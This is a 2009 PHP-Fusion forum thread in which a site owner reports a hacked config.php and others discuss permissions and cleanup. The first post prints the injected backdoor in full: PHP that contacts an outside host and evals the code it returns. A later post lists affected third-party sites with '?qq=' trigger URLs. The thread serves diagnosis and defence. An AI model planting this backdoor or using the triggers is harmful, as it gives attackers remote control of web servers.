Thread subject: PHP-Fusion :: config.php phpfusion6 hacked

Posted by Lory on 04-01-2009 19:28
#1
the config.php file was hacked

I had this in my config.php file before the database setting

Code
<?php

if(isset($_GET['qq'])) {
$sock = @fsockopen('km20725.keymachine.de', 80);
if($sock){
fwrite ($sock, 'GET http://km20725.keymachine.de/prv/index.php?host='.$_SERVER['SERVER_NAME'].'&qq='.$_GET['qq'].' HTTP/1.0'."rn");
fwrite ($sock, 'Host: km20725.keymachine.de'."rnrn");
while($content[] = fgets ($sock));
$content = implode('', $content);
@eval(trim(substr($content, strpos($content, "rnrn"))));
fclose ($sock);}
}





on the domain www.ka-design.info

Notice: Undefined index: post_edituser in /home/pfusion/public_html/print.php on line 114
Edited by Lory on 05-01-2009 10:35

Posted by Lory on 04-01-2009 19:37
#2
look, same thing happens here..

http://www.christianiateater.no/news.php

http://www.christianiateater.no/?qq=41870 - hacked part

found on google

i41.tinypic.com/1zczk7l.gif

and these are just the last referers (last few minutes)

i42.tinypic.com/i3zxnm.gif

They do the same with wordpress

http://www.vitalheute.com/
http://www.vitalheute.com/?qq=231700

Notice: Undefined index: post_edituser in /home/pfusion/public_html/print.php on line 114
Edited by Lory on 04-01-2009 20:11

Posted by Lory on 05-01-2009 10:06
#3
hm :) very interesting, lot's of phpfusion sites hakced the same way nobody says nothing, just editing the first post so now it looks nice ;)

Posted by muscapaul on 05-01-2009 10:57
#4
Looking on google along those lines it appears they are all v6 sites. Possibly they were attacked earlier when the were vulnerable and some of them even may still be vulnerable. Some sites appear to suffer either injected iframes or inserted weblink panels. These sites need to be cleaned with a full scan of the database and files on the server.

Posted by kneekoo on 05-01-2009 11:44
#5
The question is... Did you CHMOD 644 your config.php after you finished the install? I only wish I could get that answer from the rest of the "hacked" people as well.

Yes, accidents can happen that a hack gets in between updates, but generally this kind of hacks reside in improper setups, which is basically the administrator's responsibility and recommended by the readme file. However, to avoid such situations we will add an extra check inside the core, just so we make sure config.php has the proper CHMOD.

Posted by AusiMods on 05-01-2009 12:47
#6
its a fairly common hack and not only fusion being attacked by it also other cms and blog systems.
As kneekoo says check your file permissions etc as with correct permissions writing to the file is not so easy.

Posted by Lory on 05-01-2009 13:02
#7
my config.php is chmoded 644 all the time (after finished installation)

Posted by muscapaul on 05-01-2009 14:01
#8
If they manage to get access to custom pages on a v6 site it is academic: they can use the custom pages to CHMOD any file and write to it, if they want. In v7 that will require the admin password of the administrator, so it will be more diffcult to do that.

Contact me if you want me to have a look at your site's files and database to see if anything is wrong. Preferably use IM.

Notice: Undefined index: post_edituser in /home/pfusion/public_html/print.php on line 114
Edited by muscapaul on 05-01-2009 14:03